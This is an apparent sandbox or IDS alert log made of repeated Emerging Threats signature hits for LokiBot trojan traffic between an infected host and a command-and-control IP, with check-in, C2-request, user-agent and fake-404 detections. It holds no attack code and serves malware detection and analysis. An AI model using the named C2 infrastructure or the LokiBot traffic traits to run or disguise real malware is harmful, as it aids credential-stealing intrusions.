                                            12/02/20-11:53:40.669920TCP2025381ET TROJAN LokiBot Checkin4987180192.168.2.645.144.3.234
                                            12/02/20-11:53:40.669920TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.2.645.144.3.234
                                            12/02/20-11:53:40.795723TCP2025483ET TROJAN LokiBot Fake 404 Response804987145.144.3.234192.168.2.6
                                            12/02/20-11:53:41.124374TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987280192.168.2.645.144.3.234
                                            12/02/20-11:53:41.124374TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987280192.168.2.645.144.3.234
                                            12/02/20-11:53:41.124374TCP2025381ET TROJAN LokiBot Checkin4987280192.168.2.645.144.3.234
                                            12/02/20-11:53:41.124374TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987280192.168.2.645.144.3.234
                                            12/02/20-11:53:41.271989TCP2025483ET TROJAN LokiBot Fake 404 Response804987245.144.3.234192.168.2.6
                                            12/02/20-11:53:41.506474TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.2.645.144.3.234
                                            12/02/20-11:53:41.506474TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.2.645.144.3.234
                                            12/02/20-11:53:41.506474TCP2025381ET TROJAN LokiBot Checkin4987380192.168.2.645.144.3.234
                                            12/02/20-11:53:41.506474TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.2.645.144.3.234
                                            12/02/20-11:53:41.630264TCP2025483ET TROJAN LokiBot Fake 404 Response804987345.144.3.234192.168.2.6
                                            12/02/20-11:53:41.908530TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987480192.168.2.645.144.3.234
                                            12/02/20-11:53:41.908530TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987480192.168.2.645.144.3.234
                                            12/02/20-11:53:41.908530TCP2025381ET TROJAN LokiBot Checkin4987480192.168.2.645.144.3.234
                                            12/02/20-11:53:41.908530TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987480192.168.2.645.144.3.234
                                            12/02/20-11:53:42.037556TCP2025483ET TROJAN LokiBot Fake 404 Response804987445.144.3.234192.168.2.6
                                            12/02/20-11:53:42.363986TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.2.645.144.3.234
                                            12/02/20-11:53:42.363986TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.2.645.144.3.234
                                            12/02/20-11:53:42.363986TCP2025381ET TROJAN LokiBot Checkin4987580192.168.2.645.144.3.234
                                            12/02/20-11:53:42.363986TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.2.645.144.3.234
                                            12/02/20-11:53:44.446561TCP2025483ET TROJAN LokiBot Fake 404 Response804987545.144.3.234192.168.2.6
                                            12/02/20-11:53:44.731017TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.2.645.144.3.234
                                            12/02/20-11:53:44.731017TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.2.645.144.3.234
                                            12/02/20-11:53:44.731017TCP2025381ET TROJAN LokiBot Checkin4987680192.168.2.645.144.3.234
                                            12/02/20-11:53:44.731017TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.2.645.144.3.234
                                            12/02/20-11:53:44.857262TCP2025483ET TROJAN LokiBot Fake 404 Response804987645.144.3.234192.168.2.6
                                            12/02/20-11:53:45.110818TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987780192.168.2.645.144.3.234
                                            12/02/20-11:53:45.110818TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987780192.168.2.645.144.3.234
                                            12/02/20-11:53:45.110818TCP2025381ET TROJAN LokiBot Checkin4987780192.168.2.645.144.3.234
                                            12/02/20-11:53:45.110818TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987780192.168.2.645.144.3.234
                                            12/02/20-11:53:45.239439TCP2025483ET TROJAN LokiBot Fake 404 Response804987745.144.3.234192.168.2.6
                                            12/02/20-11:53:45.530515TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987880192.168.2.645.144.3.234
                                            12/02/20-11:53:45.530515TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987880192.168.2.645.144.3.234
                                            12/02/20-11:53:45.530515TCP2025381ET TROJAN LokiBot Checkin4987880192.168.2.645.144.3.234
                                            12/02/20-11:53:45.530515TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987880192.168.2.645.144.3.234
                                            12/02/20-11:53:45.675242TCP2025483ET TROJAN LokiBot Fake 404 Response804987845.144.3.234192.168.2.6
                                            12/02/20-11:53:45.971010TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.2.645.144.3.234
                                            12/02/20-11:53:45.971010TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.2.645.144.3.234
                                            12/02/20-11:53:45.971010TCP2025381ET TROJAN LokiBot Checkin4987980192.168.2.645.144.3.234
                                            12/02/20-11:53:45.971010TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.2.645.144.3.234
                                            12/02/20-11:53:46.096855TCP2025483ET TROJAN LokiBot Fake 404 Response804987945.144.3.234192.168.2.6
                                            12/02/20-11:53:46.394584TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988080192.168.2.645.144.3.234
                                            12/02/20-11:53:46.394584TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988080192.168.2.645.144.3.234
                                            12/02/20-11:53:46.394584TCP2025381ET TROJAN LokiBot Checkin4988080192.168.2.645.144.3.234
                                            12/02/20-11:53:46.394584TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988080192.168.2.645.144.3.234
                                            12/02/20-11:53:46.522598TCP2025483ET TROJAN LokiBot Fake 404 Response804988045.144.3.234192.168.2.6
                                            12/02/20-11:53:46.812717TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.2.645.144.3.234
                                            12/02/20-11:53:46.812717TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.2.645.144.3.234
                                            12/02/20-11:53:46.812717TCP2025381ET TROJAN LokiBot Checkin4988180192.168.2.645.144.3.234
                                            12/02/20-11:53:46.812717TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.2.645.144.3.234
                                            12/02/20-11:53:46.941850TCP2025483ET TROJAN LokiBot Fake 404 Response804988145.144.3.234192.168.2.6
                                            12/02/20-11:53:47.221801TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.2.645.144.3.234
                                            12/02/20-11:53:47.221801TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.2.645.144.3.234
                                            12/02/20-11:53:47.221801TCP2025381ET TROJAN LokiBot Checkin4988280192.168.2.645.144.3.234
                                            12/02/20-11:53:47.221801TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.2.645.144.3.234
                                            12/02/20-11:53:47.351135TCP2025483ET TROJAN LokiBot Fake 404 Response804988245.144.3.234192.168.2.6
                                            12/02/20-11:53:47.662367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.645.144.3.234
                                            12/02/20-11:53:47.662367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.645.144.3.234
                                            12/02/20-11:53:47.662367TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.645.144.3.234
                                            12/02/20-11:53:47.662367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.645.144.3.234
                                            12/02/20-11:53:47.791693TCP2025483ET TROJAN LokiBot Fake 404 Response804988345.144.3.234192.168.2.6
                                            12/02/20-11:53:48.086474TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.2.645.144.3.234
                                            12/02/20-11:53:48.086474TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.2.645.144.3.234
                                            12/02/20-11:53:48.086474TCP2025381ET TROJAN LokiBot Checkin4988480192.168.2.645.144.3.234
                                            12/02/20-11:53:48.086474TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.2.645.144.3.234
                                            12/02/20-11:53:48.211005TCP2025483ET TROJAN LokiBot Fake 404 Response804988445.144.3.234192.168.2.6
                                            12/02/20-11:53:48.497369TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.2.645.144.3.234
                                            12/02/20-11:53:48.497369TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.2.645.144.3.234
                                            12/02/20-11:53:48.497369TCP2025381ET TROJAN LokiBot Checkin4988580192.168.2.645.144.3.234
                                            12/02/20-11:53:48.497369TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.2.645.144.3.234
                                            12/02/20-11:53:48.626811TCP2025483ET TROJAN LokiBot Fake 404 Response804988545.144.3.234192.168.2.6
                                            12/02/20-11:53:48.930011TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.2.645.144.3.234
                                            12/02/20-11:53:48.930011TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.2.645.144.3.234
                                            12/02/20-11:53:48.930011TCP2025381ET TROJAN LokiBot Checkin4988680192.168.2.645.144.3.234
                                            12/02/20-11:53:48.930011TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.2.645.144.3.234
                                            12/02/20-11:53:49.073543TCP2025483ET TROJAN LokiBot Fake 404 Response804988645.144.3.234192.168.2.6
                                            12/02/20-11:53:49.346886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.2.645.144.3.234
                                            12/02/20-11:53:49.346886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.2.645.144.3.234
                                            12/02/20-11:53:49.346886TCP2025381ET TROJAN LokiBot Checkin4988780192.168.2.645.144.3.234
                                            12/02/20-11:53:49.346886TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.2.645.144.3.234
                                            12/02/20-11:53:49.473379TCP2025483ET TROJAN LokiBot Fake 404 Response804988745.144.3.234192.168.2.6
                                            12/02/20-11:53:49.720684TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.2.645.144.3.234
                                            12/02/20-11:53:49.720684TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.2.645.144.3.234
                                            12/02/20-11:53:49.720684TCP2025381ET TROJAN LokiBot Checkin4988880192.168.2.645.144.3.234
                                            12/02/20-11:53:49.720684TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.2.645.144.3.234
                                            12/02/20-11:53:49.851969TCP2025483ET TROJAN LokiBot Fake 404 Response804988845.144.3.234192.168.2.6
                                            12/02/20-11:53:50.131951TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.2.645.144.3.234
                                            12/02/20-11:53:50.131951TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.2.645.144.3.234
                                            12/02/20-11:53:50.131951TCP2025381ET TROJAN LokiBot Checkin4988980192.168.2.645.144.3.234
                                            12/02/20-11:53:50.131951TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.2.645.144.3.234
                                            12/02/20-11:53:50.264707TCP2025483ET TROJAN LokiBot Fake 404 Response804988945.144.3.234192.168.2.6
                                            12/02/20-11:53:50.537655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.2.645.144.3.234
                                            12/02/20-11:53:50.537655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.2.645.144.3.234
                                            12/02/20-11:53:50.537655TCP2025381ET TROJAN LokiBot Checkin4989080192.168.2.645.144.3.234
                                            12/02/20-11:53:50.537655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.2.645.144.3.234
                                            12/02/20-11:53:50.667494TCP2025483ET TROJAN LokiBot Fake 404 Response804989045.144.3.234192.168.2.6
                                            12/02/20-11:53:50.981118TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.2.645.144.3.234
                                            12/02/20-11:53:50.981118TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.2.645.144.3.234
                                            12/02/20-11:53:50.981118TCP2025381ET TROJAN LokiBot Checkin4989180192.168.2.645.144.3.234
                                            12/02/20-11:53:50.981118TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.2.645.144.3.234
                                            12/02/20-11:53:51.109476TCP2025483ET TROJAN LokiBot Fake 404 Response804989145.144.3.234192.168.2.6
                                            12/02/20-11:53:51.500958TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.2.645.144.3.234
                                            12/02/20-11:53:51.500958TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.2.645.144.3.234
                                            12/02/20-11:53:51.500958TCP2025381ET TROJAN LokiBot Checkin4989280192.168.2.645.144.3.234
                                            12/02/20-11:53:51.500958TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.2.645.144.3.234
                                            12/02/20-11:53:51.629140TCP2025483ET TROJAN LokiBot Fake 404 Response804989245.144.3.234192.168.2.6
                                            12/02/20-11:53:51.875501TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989480192.168.2.645.144.3.234
                                            12/02/20-11:53:51.875501TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989480192.168.2.645.144.3.234
                                            12/02/20-11:53:51.875501TCP2025381ET TROJAN LokiBot Checkin4989480192.168.2.645.144.3.234
                                            12/02/20-11:53:51.875501TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989480192.168.2.645.144.3.234
                                            12/02/20-11:53:52.001681TCP2025483ET TROJAN LokiBot Fake 404 Response804989445.144.3.234192.168.2.6
                                            12/02/20-11:53:52.299954TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.2.645.144.3.234
                                            12/02/20-11:53:52.299954TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.2.645.144.3.234
                                            12/02/20-11:53:52.299954TCP2025381ET TROJAN LokiBot Checkin4989580192.168.2.645.144.3.234
                                            12/02/20-11:53:52.299954TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.2.645.144.3.234
                                            12/02/20-11:53:52.427256TCP2025483ET TROJAN LokiBot Fake 404 Response804989545.144.3.234192.168.2.6
                                            12/02/20-11:53:52.669432TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989680192.168.2.645.144.3.234
                                            12/02/20-11:53:52.669432TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.2.645.144.3.234
                                            12/02/20-11:53:52.669432TCP2025381ET TROJAN LokiBot Checkin4989680192.168.2.645.144.3.234
                                            12/02/20-11:53:52.669432TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989680192.168.2.645.144.3.234
                                            12/02/20-11:53:52.793746TCP2025483ET TROJAN LokiBot Fake 404 Response804989645.144.3.234192.168.2.6
                                            12/02/20-11:53:53.093415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989880192.168.2.645.144.3.234
                                            12/02/20-11:53:53.093415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989880192.168.2.645.144.3.234
                                            12/02/20-11:53:53.093415TCP2025381ET TROJAN LokiBot Checkin4989880192.168.2.645.144.3.234
                                            12/02/20-11:53:53.093415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989880192.168.2.645.144.3.234
                                            12/02/20-11:53:53.221691TCP2025483ET TROJAN LokiBot Fake 404 Response804989845.144.3.234192.168.2.6
                                            12/02/20-11:53:53.485192TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989980192.168.2.645.144.3.234
                                            12/02/20-11:53:53.485192TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989980192.168.2.645.144.3.234
                                            12/02/20-11:53:53.485192TCP2025381ET TROJAN LokiBot Checkin4989980192.168.2.645.144.3.234
                                            12/02/20-11:53:53.485192TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989980192.168.2.645.144.3.234
                                            12/02/20-11:53:53.608858TCP2025483ET TROJAN LokiBot Fake 404 Response804989945.144.3.234192.168.2.6
                                            12/02/20-11:53:53.899708TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990080192.168.2.645.144.3.234
                                            12/02/20-11:53:53.899708TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990080192.168.2.645.144.3.234
                                            12/02/20-11:53:53.899708TCP2025381ET TROJAN LokiBot Checkin4990080192.168.2.645.144.3.234
                                            12/02/20-11:53:53.899708TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990080192.168.2.645.144.3.234
                                            12/02/20-11:53:54.026077TCP2025483ET TROJAN LokiBot Fake 404 Response804990045.144.3.234192.168.2.6
                                            12/02/20-11:53:54.292505TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990280192.168.2.645.144.3.234
                                            12/02/20-11:53:54.292505TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990280192.168.2.645.144.3.234
                                            12/02/20-11:53:54.292505TCP2025381ET TROJAN LokiBot Checkin4990280192.168.2.645.144.3.234
                                            12/02/20-11:53:54.292505TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990280192.168.2.645.144.3.234
                                            12/02/20-11:53:54.429546TCP2025483ET TROJAN LokiBot Fake 404 Response804990245.144.3.234192.168.2.6
                                            12/02/20-11:53:54.722060TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990380192.168.2.645.144.3.234
                                            12/02/20-11:53:54.722060TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990380192.168.2.645.144.3.234
                                            12/02/20-11:53:54.722060TCP2025381ET TROJAN LokiBot Checkin4990380192.168.2.645.144.3.234
                                            12/02/20-11:53:54.722060TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990380192.168.2.645.144.3.234
                                            12/02/20-11:53:54.853922TCP2025483ET TROJAN LokiBot Fake 404 Response804990345.144.3.234192.168.2.6
                                            12/02/20-11:53:55.140344TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990480192.168.2.645.144.3.234
                                            12/02/20-11:53:55.140344TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990480192.168.2.645.144.3.234
                                            12/02/20-11:53:55.140344TCP2025381ET TROJAN LokiBot Checkin4990480192.168.2.645.144.3.234
                                            12/02/20-11:53:55.140344TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990480192.168.2.645.144.3.234
                                            12/02/20-11:53:55.270212TCP2025483ET TROJAN LokiBot Fake 404 Response804990445.144.3.234192.168.2.6
                                            12/02/20-11:53:55.522611TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990580192.168.2.645.144.3.234
                                            12/02/20-11:53:55.522611TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990580192.168.2.645.144.3.234
                                            12/02/20-11:53:55.522611TCP2025381ET TROJAN LokiBot Checkin4990580192.168.2.645.144.3.234
                                            12/02/20-11:53:55.522611TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990580192.168.2.645.144.3.234
                                            12/02/20-11:53:55.652744TCP2025483ET TROJAN LokiBot Fake 404 Response804990545.144.3.234192.168.2.6
                                            12/02/20-11:53:55.936893TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990680192.168.2.645.144.3.234
                                            12/02/20-11:53:55.936893TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990680192.168.2.645.144.3.234
                                            12/02/20-11:53:55.936893TCP2025381ET TROJAN LokiBot Checkin4990680192.168.2.645.144.3.234
                                            12/02/20-11:53:55.936893TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990680192.168.2.645.144.3.234
                                            12/02/20-11:53:56.061289TCP2025483ET TROJAN LokiBot Fake 404 Response804990645.144.3.234192.168.2.6
                                            12/02/20-11:53:56.339313TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990780192.168.2.645.144.3.234
                                            12/02/20-11:54:18.320180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995780192.168.2.645.144.3.234
                                            12/02/20-11:54:18.320180TCP2025381ET TROJAN LokiBot Checkin4995780192.168.2.645.144.3.234
                                            12/02/20-11:54:18.320180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995780192.168.2.645.144.3.234
                                            12/02/20-11:54:18.450666TCP2025483ET TROJAN LokiBot Fake 404 Response804995745.144.3.234192.168.2.6
                                            12/02/20-11:54:18.788389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995880192.168.2.645.144.3.234
                                            12/02/20-11:54:18.788389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995880192.168.2.645.144.3.234
                                            12/02/20-11:54:18.788389TCP2025381ET TROJAN LokiBot Checkin4995880192.168.2.645.144.3.234
                                            12/02/20-11:54:18.788389TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995880192.168.2.645.144.3.234
                                            12/02/20-11:54:18.917301TCP2025483ET TROJAN LokiBot Fake 404 Response804995845.144.3.234192.168.2.6
                                            12/02/20-11:54:19.241028TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995980192.168.2.645.144.3.234
                                            12/02/20-11:54:19.241028TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995980192.168.2.645.144.3.234
                                            12/02/20-11:54:19.241028TCP2025381ET TROJAN LokiBot Checkin4995980192.168.2.645.144.3.234
                                            12/02/20-11:54:19.241028TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995980192.168.2.645.144.3.234
                                            12/02/20-11:54:19.373669TCP2025483ET TROJAN LokiBot Fake 404 Response804995945.144.3.234192.168.2.6
                                            12/02/20-11:54:19.628893TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996080192.168.2.645.144.3.234
                                            12/02/20-11:54:19.628893TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996080192.168.2.645.144.3.234
                                            12/02/20-11:54:19.628893TCP2025381ET TROJAN LokiBot Checkin4996080192.168.2.645.144.3.234
                                            12/02/20-11:54:19.628893TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996080192.168.2.645.144.3.234
                                            12/02/20-11:54:19.758888TCP2025483ET TROJAN LokiBot Fake 404 Response804996045.144.3.234192.168.2.6
                                            12/02/20-11:54:20.012145TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996180192.168.2.645.144.3.234
                                            12/02/20-11:54:20.012145TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996180192.168.2.645.144.3.234
                                            12/02/20-11:54:20.012145TCP2025381ET TROJAN LokiBot Checkin4996180192.168.2.645.144.3.234
                                            12/02/20-11:54:20.012145TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996180192.168.2.645.144.3.234
                                            12/02/20-11:54:20.137866TCP2025483ET TROJAN LokiBot Fake 404 Response804996145.144.3.234192.168.2.6
                                            12/02/20-11:54:20.474218TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996280192.168.2.645.144.3.234
                                            12/02/20-11:54:20.474218TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996280192.168.2.645.144.3.234
                                            12/02/20-11:54:20.474218TCP2025381ET TROJAN LokiBot Checkin4996280192.168.2.645.144.3.234
                                            12/02/20-11:54:20.474218TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996280192.168.2.645.144.3.234
                                            12/02/20-11:54:20.612632TCP2025483ET TROJAN LokiBot Fake 404 Response804996245.144.3.234192.168.2.6
                                            12/02/20-11:54:20.865487TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996380192.168.2.645.144.3.234
                                            12/02/20-11:54:20.865487TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996380192.168.2.645.144.3.234
                                            12/02/20-11:54:20.865487TCP2025381ET TROJAN LokiBot Checkin4996380192.168.2.645.144.3.234
                                            12/02/20-11:54:20.865487TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996380192.168.2.645.144.3.234
                                            12/02/20-11:54:20.993083TCP2025483ET TROJAN LokiBot Fake 404 Response804996345.144.3.234192.168.2.6
                                            12/02/20-11:54:21.251330TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996480192.168.2.645.144.3.234
                                            12/02/20-11:54:21.251330TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996480192.168.2.645.144.3.234
                                            12/02/20-11:54:21.251330TCP2025381ET TROJAN LokiBot Checkin4996480192.168.2.645.144.3.234
                                            12/02/20-11:54:21.251330TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996480192.168.2.645.144.3.234
                                            12/02/20-11:54:21.376931TCP2025483ET TROJAN LokiBot Fake 404 Response804996445.144.3.234192.168.2.6
                                            12/02/20-11:54:21.612720TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996580192.168.2.645.144.3.234
                                            12/02/20-11:54:21.612720TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996580192.168.2.645.144.3.234
                                            12/02/20-11:54:21.612720TCP2025381ET TROJAN LokiBot Checkin4996580192.168.2.645.144.3.234
                                            12/02/20-11:54:21.612720TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996580192.168.2.645.144.3.234
                                            12/02/20-11:54:21.738057TCP2025483ET TROJAN LokiBot Fake 404 Response804996545.144.3.234192.168.2.6
                                            12/02/20-11:54:21.993889TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996680192.168.2.645.144.3.234
                                            12/02/20-11:54:21.993889TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996680192.168.2.645.144.3.234
                                            12/02/20-11:54:21.993889TCP2025381ET TROJAN LokiBot Checkin4996680192.168.2.645.144.3.234
                                            12/02/20-11:54:21.993889TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996680192.168.2.645.144.3.234
                                            12/02/20-11:54:22.123761TCP2025483ET TROJAN LokiBot Fake 404 Response804996645.144.3.234192.168.2.6
                                            12/02/20-11:54:22.405113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996780192.168.2.645.144.3.234
                                            12/02/20-11:54:22.405113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996780192.168.2.645.144.3.234
                                            12/02/20-11:54:22.405113TCP2025381ET TROJAN LokiBot Checkin4996780192.168.2.645.144.3.234
                                            12/02/20-11:54:22.405113TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996780192.168.2.645.144.3.234
                                            12/02/20-11:54:22.542134TCP2025483ET TROJAN LokiBot Fake 404 Response804996745.144.3.234192.168.2.6
                                            12/02/20-11:54:22.819145TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996880192.168.2.645.144.3.234
                                            12/02/20-11:54:22.819145TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996880192.168.2.645.144.3.234
                                            12/02/20-11:54:22.819145TCP2025381ET TROJAN LokiBot Checkin4996880192.168.2.645.144.3.234
                                            12/02/20-11:54:22.819145TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996880192.168.2.645.144.3.234
                                            12/02/20-11:54:22.944392TCP2025483ET TROJAN LokiBot Fake 404 Response804996845.144.3.234192.168.2.6
                                            12/02/20-11:54:23.191460TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996980192.168.2.645.144.3.234
                                            12/02/20-11:54:23.191460TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996980192.168.2.645.144.3.234
                                            12/02/20-11:54:23.191460TCP2025381ET TROJAN LokiBot Checkin4996980192.168.2.645.144.3.234
                                            12/02/20-11:54:23.191460TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996980192.168.2.645.144.3.234
                                            12/02/20-11:54:23.319732TCP2025483ET TROJAN LokiBot Fake 404 Response804996945.144.3.234192.168.2.6
                                            12/02/20-11:54:23.600042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997080192.168.2.645.144.3.234
                                            12/02/20-11:54:23.600042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997080192.168.2.645.144.3.234
                                            12/02/20-11:54:23.600042TCP2025381ET TROJAN LokiBot Checkin4997080192.168.2.645.144.3.234
                                            12/02/20-11:54:23.600042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997080192.168.2.645.144.3.234
                                            12/02/20-11:54:23.739671TCP2025483ET TROJAN LokiBot Fake 404 Response804997045.144.3.234192.168.2.6
                                            12/02/20-11:54:24.003743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997180192.168.2.645.144.3.234
                                            12/02/20-11:54:24.003743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997180192.168.2.645.144.3.234
                                            12/02/20-11:54:24.003743TCP2025381ET TROJAN LokiBot Checkin4997180192.168.2.645.144.3.234
                                            12/02/20-11:54:24.003743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997180192.168.2.645.144.3.234
                                            12/02/20-11:54:24.134993TCP2025483ET TROJAN LokiBot Fake 404 Response804997145.144.3.234192.168.2.6
                                            12/02/20-11:54:24.413582TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997280192.168.2.645.144.3.234
